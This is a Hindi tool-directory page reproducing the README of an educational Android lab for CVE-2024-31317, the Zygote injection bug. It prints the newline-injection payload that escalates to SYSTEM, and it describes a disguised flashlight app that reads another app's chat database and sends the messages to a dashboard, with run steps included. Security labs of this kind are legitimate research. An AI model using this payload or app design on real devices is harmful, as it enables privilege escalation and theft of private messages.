Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ZygoteExploitDemo — Android पर CVE-2024-31317 Zygote Injection Vulnerability का शैक्षिक प्रदर्शन | Kitploit
उपकरण/GitHubGitHub/gitamans/zygoteexploitdemo
एंड्रॉइड सुरक्षाविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणमोबाइल ऐप पेंटेस्टिंगपेनिट्रेशन टेस्टिंगमोबाइल सुरक्षालर्निंग और शिक्षाबाइनरी शोषणलैब और अभ्यास
GitHubgitamans/zygoteexploitdemo

ZygoteExploitDemo

225 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Android पर CVE-2024-31317 Zygote Injection Vulnerability का शैक्षिक प्रदर्शन

रिपॉजिटरी देखें

🔥 ZygoteExploitDemo - CVE-2024-31317 एंड्रॉइड सुरक्षा प्रयोगशाला

🚨 एंड्रॉइड ज़ायगोट इंजेक्शन भेद्यता का शैक्षिक प्रदर्शन

GitHub stars GitHub forks GitHub license


📋 अवलोकन

यह प्रयोगशाला CVE-2024-31317 का प्रदर्शन करती है, जो एक गंभीर एंड्रॉइड भेद्यता है जो एक दुर्भावनापूर्ण ऐप को विशेषाधिकारों को SYSTEM स्तर (UID 1000) तक बढ़ाने और एंड्रॉइड सैंडबॉक्स को बायपास करके वास्तविक समय में अन्य अनुप्रयोगों से डेटा पढ़ने की अनुमति देती है।

🎯 यह डेमो क्या दिखाता है


🏗️ परियोजना संरचना

root@kitploit:~
ZygoteExploitDemo/
├── 📱 apps/
│   ├── SecureChat/              # पीड़ित ऐप (Jetpack Compose)
│   │   ├── SQLite में एन्क्रिप्टेड संदेश संग्रहीत
│   │   └── WhatsApp-शैली एन्क्रिप्शन का अनुकरण
│   │
│   ├── FlashlightPro/           # शोषण के साथ दुर्भावनापूर्ण ऐप
│   │   ├── सामान्य फ्लैशलाइट UI (ध्यान भटकाना)
│   │   ├── पृष्ठभूमि शोषण सेवा
│   │   └── WRITE_SECURE_SETTINGS अनुमति
│   │
│   └── MonitorService/          # SYSTEM-स्तरीय रीडर
│       ├── शोषण के बाद UID 1000 के साथ चलता है
│       ├── SecureChat डेटाबेस पढ़ता है
│       └── डैशबोर्ड पर डेटा बाहर निकालता है
│
├── 📊 dashboard/                # Flask वेब डैशबोर्ड
│   └── app.py                   # चुराए गए संदेशों को लाइव दिखाता है
│
├── 📜 scripts/                  # स्वचालन स्क्रिप्ट
│   ├── setup_vulnerable_emulator.sh
│   ├── build_all_apps.sh
│   ├── install_all_apps.sh
│   ├── run_exploit.py
│   └── monitor_logs.sh
│
├── 🎯 exploits/                 # शोषण जानकारी
│   ├── CVE-2024-31317.md
│   └── payloads.txt
│
└── 📁 tamplates/                # कोड टेम्पलेट
    ├── exploit_template.java
    └── dashboard_template.html

🔧 तकनीकी विवरण

भेद्यता

CVE-2024-31317 उस तरीके में मौजूद है जिसमें एंड्रॉइड का Zygote प्रक्रिया hidden_api_blacklist_exemptions सिस्टम सेटिंग को संभालती है। इनपुट स्वच्छता की कमी के कारण, एक हमलावर Zygote कमांड में मनमाने तर्क जोड़ने के लिए न्यूलाइन वर्णों को इंजेक्ट कर सकता है।

हमला वेक्टर:

root@kitploit:~
Settings.Global.putString(
    contentResolver,
    "hidden_api_blacklist_exemptions",
    "LClass1;->method1(\n" +
    "7\n" +
    "--setuid=1000\n" +     // SYSTEM के रूप में चलाएं
    "--setgid=1000\n" +     // SYSTEM समूह के रूप में चलाएं
    "--invoke-with\n" +
    "am start-service ...;\n"
);

प्रभावित संस्करण

संस्करणस्थिति
Android 9 - 14❌ कमजोर (जून 2024 पैच से पहले)
Android 14+✅ पैच किया गया (जून 2024 सुरक्षा अद्यतन)
Android 15+✅ सुरक्षित

🚀 त्वरित आरंभ गाइड

पूर्वापेक्षाएँ

  • ✅ Android Studio (नवीनतम)
  • ✅ Flask के साथ Python 3.8+
  • ✅ प्लेटफॉर्म टूल्स के साथ Android SDK
  • ✅ एमुलेटर के लिए 10GB मुक्त डिस्क स्थान

चरण 1: रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/GitAmanS/ZygoteExploitDemo.git
cd ZygoteExploitDemo

चरण 2: कमजोर एमुलेटर सेट करें

root@kitploit:~
cd scripts
chmod +x *.sh
./setup_vulnerable_emulator.sh

# एमुलेटर प्रारंभ करें
emulator -avd vulnerable_android_12

चरण 3: ऐप्स बनाएं और इंस्टॉल करें

root@kitploit:~
# एक नए टर्मिनल में
cd ZygoteExploitDemo/scripts
./build_all_apps.sh
./install_all_apps.sh

चरण 4: डैशबोर्ड प्रारंभ करें

root@kitploit:~
cd ../dashboard
pip3 install flask flask-cors
python3 app.py

📱 अपने ब्राउज़र में http://localhost:5000 खोलें

चरण 5: एक्सप्लॉइट चलाएँ

root@kitploit:~
cd ../scripts
python3 run_exploit.py

चरण 6: जादू देखें ✨

  1. एमुलेटर में SecureChat ऐप खोलें
  2. कुछ परीक्षण संदेश भेजें
  3. उन्हें डैशबोर्ड पर तुरंत! 🔴 दिखाई देते हुए देखें

📸 डेमो वीडियो

🎬 डेमो वीडियो जल्द ही आ रहा है


🔬 यह कैसे काम करता है - चरण दर चरण

  1. FlashlightPro WRITE_SECURE_SETTINGS अनुमति का अनुरोध करता है
  2. एक्सप्लॉइट कोड Zygote सेटिंग्स में दुर्भावनापूर्ण पेलोड इंजेक्ट करता है
  3. Zygote SYSTEM विशेषाधिकारों (UID 1000) के साथ MonitorService को स्पॉन करता है
  4. SYSTEM सेवा एंड्रॉइड सैंडबॉक्स प्रतिबंधों को बायपास करती है
  5. सीधे डेटाबेस /data/data/com.securechat/databases/ से पढ़ता है
  6. HTTP POST के माध्यम से Flask डैशबोर्ड पर डेटा बाहर निकालना
  7. चुराए गए एन्क्रिप्टेड संदेशों का वास्तविक समय प्रदर्शन

📚 सीखने के संसाधन

  • Android सुरक्षा बुलेटिन
  • CVE-2024-31317 विवरण
  • CleoV2 द्वारा मूल PoC

🤝 योगदान

योगदान का स्वागत है! कृपया:

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर ब्रांच बनाएं
  3. पुल रिक्वेस्ट सबमिट करें

योगदान के क्षेत्र:

  • 🎯 अतिरिक्त एक्सप्लॉइट पेलोड
  • 🛡️ बेहतर पहचान विधियाँ
  • 📖 बेहतर दस्तावेज़ीकरण
  • 🌍 अन्य भाषाओं में अनुवाद

📄 लाइसेंस

MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें


👨‍💻 लेखक

Aman - @GitAmanS


⭐ सहायता

यदि आपको यह शैक्षिक लगा, तो कृपया इसे एक स्टार दें! ⭐


सुरक्षा शोधकर्ताओं के लिए, एक सुरक्षा शोधकर्ता द्वारा बनाया गया

याद रखें: महान शक्ति के साथ महान जिम्मेदारी आती है 🕷️

टूल डाउनलोड करें
चरणविवरणदृश्य
1उपयोगकर्ता "Flashlight Pro" नामक एक निर्दोष दिखने वाला ऐप इंस्टॉल करता है🔦
2ऐप SYSTEM पहुँच प्राप्त करने के लिए CVE-2024-31317 का शोषण करता है💉
3SYSTEM-स्तरीय सेवा "SecureChat" संदेश पढ़ती है👁️
4चुराए गए संदेश लाइव डैशबोर्ड पर दिखाई देते हैं📊